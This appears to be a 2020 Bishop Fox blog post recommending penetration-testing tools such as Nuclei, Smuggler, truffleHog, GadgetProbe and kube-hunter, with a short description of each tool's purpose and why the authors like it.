Around this time last year, we released a list of our favorite pen testing tools for client engagements and in our own research. This year, we’re updating that list with some new additions (thanks to Jim Holcumb, Matt Keeley, and Chris Davis for their help compiling this new-for-2020 list.) A reminder before we get into the thick of it: this list isn’t intended to be comprehensive or definitive. It’s simply a selection of some tools we appreciated over the past several months that we think readers will find helpful. Hit us up with your own suggestions in the comments or on Twitter @bishopfox.
Creator: Project Discovery (@pdiscoveryio)
Its Use: Nuclei is a community-built scanner that works remarkably fast.
Why We Like It: If you choose to download only one tool on this list, make it this one. Nuclei is noteworthy for its sizable repository of cutting-edge vulnerability signatures (as seen here) as well as its impressive speed. The modern web is massive and agile, and the scanners of yesteryear simply can't keep up. Nuclei is a powerful solution that allows you to quickly scan large quantities of data.
Creator: Spyse (@SpyseHQ)
Its Use: Imagine a search engine, but built strictly for the security community. That’s Spyse. The difference between it and traditional search engines is that Spyse allows you to look up CVEs – and it will return a list of targets.
Why We Like It: This makes information-gathering and any OSINT-related activities for your security assessments so much easier. For your engagements with larger clients, Spyse can help you detect any public exposures faster and save you some much-needed time you can spend doing the fun stuff (AKA breaking into things).
Creator: defparam (@defparam)
Its Use: Smuggler is a Python-written HTTP request smuggling tool.
Why We Like It: Inspired by the research of James Kettle, this request smuggling tool is comprehensive and you can combine it with Burp Suite for maximum coverage. (Speaking of request smuggling, check out the HTTP/2 Cleartext variant we identified here.)
Creator: OJ Reeves
Its Use: This Golang-written tool scales for your larger engagements, and it works fast.
Why We Like It: You need a tool that can scale so you can work more efficiently. Enter GoBuster, which meets that need. (Also, we’d like to give a nod to GoWitness, another Golang-written tool with a similar function.)
Creator: Dylan Ayrey
Its Use: truffleHog is a Python script that helps you search for the secrets contained in GIT repositories via commit histories.
Why We Like It: Any tool that helps you search for exposed credentials and other secrets locked in source code is a great asset. truffleHog has been around for several years now, and it’s extremely popular due to its reliability. The team behind truffleHog recently made a go at being an enterprise, and we wish them luck on this exciting endeavor (and hope to see more kickass tools in the future).
Sidenote: Whereas truffleHog combs through commit history, our tool GitGot scours all of GitHub for secrets. Check it out if you haven’t yet.
Its Use: Want to find secrets that are accidentally exposed via Amazon EBS’s “public” mode? Then give Dufflebag – which was originally introduced to the world at DEF CON 27 – a shot.
Why We Like It: Not only because it’s the brainchild of Bishop Fox researchers, but because it’s equally beneficial for the blue team as it is the red team. By finding what you might have exposed, you can further secure your environment and better understand your attack surface.
But if you’re trying to score some bug bounties, Dufflebag will prove incredibly useful.
Creator: Jake Miller (@theBumbleSec)
Its Use: GadgetProbe takes a wordlist of Java classes, outputs serialized DNS callback objects, and reports what's lurking in the remote classpath.
Why We Like It: GadgetProbe proves a handy addition to any pen tester’s toolbox – it provides visibility into classes that are present in the remote classpath, which is invaluable when designing a custom gadget chain in a blackbox situation.
Creator: Jake Miller (@theBumbleSec)
Its Use: This tool is intended for performing wordlist and bruteforce attacks against exposed Java RMI interfaces in order to safely guess method signatures without invocation.
Why We Like It: It’s a reliable technique to obtain code execution on exposed Java RMI services.
Its Use: These two open source tools are intended for testing Kubernetes environments (as you probably figured out.) kube-bench analyzes Kubernetes to see if the instances are deployed according to best practices, and kube-hunter searches for any weaknesses.
Why We Like It: AquaSec has been incredibly generous with sharing their open source tools, and these are two of the best tools you can use for hunting for vulnerabilities in Kubernetes.
So there you have it – this year’s list of pen testing tools we recommend checking out. We’ll be back next year (or maybe sooner) with more choices for your pen testing arsenal, but we suggest stocking up on the aforementioned in the meantime. And, again, send us your suggestions on twitter: @bishopfox.